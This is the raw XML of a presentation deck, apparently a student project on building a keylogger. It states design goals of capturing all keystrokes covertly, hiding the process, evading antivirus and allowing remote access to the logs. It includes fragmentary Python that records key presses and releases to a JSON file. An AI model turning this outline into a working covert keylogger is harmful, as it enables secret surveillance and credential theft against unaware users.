              <a:buFont typeface="Franklin Gothic"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Improved user interface: The program can be enhanced to provide a more user-friendly interface, making it easier for users to navigate and use the program.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-206121" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097534" name="Google Shape;2097534;p26"/>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8636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IN" sz="4400" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>FUTURE SCOPE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538" name="Shape 2097538"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097539" name="Google Shape;2097539;p27"/>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2097540" name="Google Shape;2097540;p2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lang="en-IN" sz="2400"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1080"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2208"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="240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544" name="Shape 2097544"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097545" name="Google Shape;2097545;p28"/>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453" name="Shape 2097453"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097454" name="Google Shape;2097454;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2097455" name="Google Shape;2097455;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58649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a:t>
            </a:r>
            <a:r>
              <a:rPr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459" name="Shape 2097459"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097460" name="Google Shape;2097460;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2097461" name="Google Shape;2097461;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="323232"/>
            <a:ext cx="11029500" cy="4673400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="323999" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2208"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>"Design and implement a keylogger program that runs in the background of a computer system, capturing all keystrokes inputted by the user. The program should log the keystrokes into a file and remain undetectable to the user. Additionally, it should have features to encrypt the logged data for secure transmission and provide options for remote access to view the logged keystrokes."</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465" name="Shape 2097465"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097466" name="Google Shape;2097466;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2097467" name="Google Shape;2097467;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909017" y="233938"/>
            <a:ext cx="11613600" cy="556410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564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Libre Franklin"/>
                <a:ea typeface="Libre Franklin"/>
                <a:cs typeface="Libre Franklin"/>
                <a:sym typeface="Libre Franklin"/>
              </a:rPr>
              <a:t>1. **Keylogging**: Implement functionality to capture keystrokes from the keyboard input. This can be achieved using libraries or system-level hooks depending on the operating system.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Libre Franklin"/>
                <a:ea typeface="Libre Franklin"/>
                <a:cs typeface="Libre Franklin"/>
                <a:sym typeface="Libre Franklin"/>
              </a:rPr>
              <a:t>2. **Logging**: Store the captured keystrokes in a secure log file on the system. Ensure that the log file is encrypted to protect sensitive data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Libre Franklin"/>
                <a:ea typeface="Libre Franklin"/>
                <a:cs typeface="Libre Franklin"/>
                <a:sym typeface="Libre Franklin"/>
              </a:rPr>
              <a:t>3. **Stealth Mode**: Implement techniques to make the keylogger undetectable by the user, such as hiding its process and file locations, and avoiding detection by antivirus software.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Libre Franklin"/>
                <a:ea typeface="Libre Franklin"/>
                <a:cs typeface="Libre Franklin"/>
                <a:sym typeface="Libre Franklin"/>
              </a:rPr>
              <a:t>4. **Encryption**: Encrypt the logged data using strong encryption algorithms to prevent unauthorized access to the captured keystrokes.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471" name="Shape 2097471"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097472" name="Google Shape;2097472;p17"/>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DEVELOPMENT APPROACH</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097473" name="Google Shape;2097473;p1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IN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Developing a keylogger involves ethical and legal considerations. If you're doing it for legitimate purposes like testing security systems, the approach involves understanding operating system APIs for keyboard input, implementing a logging mechanism, and ensuring the software runs covertly if that's your intention. However, it's important to note that creating keyloggers for malicious intent is illegal and unethical.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097474" name="Google Shape;2097474;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2555311"/>
            <a:ext cx="6629400" cy="968400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="198375" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="198375">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-IN" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>The following is the development approach for the new keylogger:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Libre Franklin"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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478" name="Shape 2097478"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097479" name="Google Shape;2097479;p1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2097480" name="Google Shape;2097480;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380989" y="477169"/>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1" i="0" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1840"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097481" name="Google Shape;2097481;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767592" y="2813831"/>
            <a:ext cx="8087854" cy="15242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485" name="Shape 2097485"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097486" name="Google Shape;2097486;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2097487" name="Google Shape;2097487;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218429" y="-431231"/>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1" i="0" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Create GUI</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1840"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097488" name="Google Shape;2097488;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="1745289"/>
            <a:ext cx="10955280" cy="4667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492" name="Shape 2097492"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097493" name="Google Shape;2097493;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2097494" name="Google Shape;2097494;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296711" y="-427071"/>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1" i="0" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1840"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097495" name="Google Shape;2097495;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608200" cy="542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Initialize the variables</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keys_used = []</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flag = False</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keys = ""</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Define the on_press function</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def on_press(key):</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global flag, keys_used, keys</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if flag == False:</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keys_used.append(</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{'Pressed': f'{key}'}</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flag = True</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if flag == True:</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keys_used.append(</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{'Held': f'{key}'}</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499" name="Shape 2097499"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097500" name="Google Shape;2097500;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2097501" name="Google Shape;2097501;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296711" y="-427071"/>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1" i="0" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1840"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097502" name="Google Shape;2097502;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608200" cy="4892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Define the on_release function</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def on_release(key):</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global flag, keys_used, keys</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keys_used.append(</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{'Released': f'{key}'}</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if flag == True:</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flag = False</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keys = keys + str(key)</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Define the generate_json_file function</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def generate_json_file(keys_used):</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with open('key_log.json', '+wb') as key_log:</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key_list_bytes = json.dumps(keys_used).encode()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Libre Franklin"/>
                <a:ea typeface="Libre Franklin"/>
                <a:cs typeface="Libre Franklin"/>
                <a:sym typeface="Libre Franklin"/>
              </a:rPr>
              <a:t>        key_log.write(key_list_bytes)</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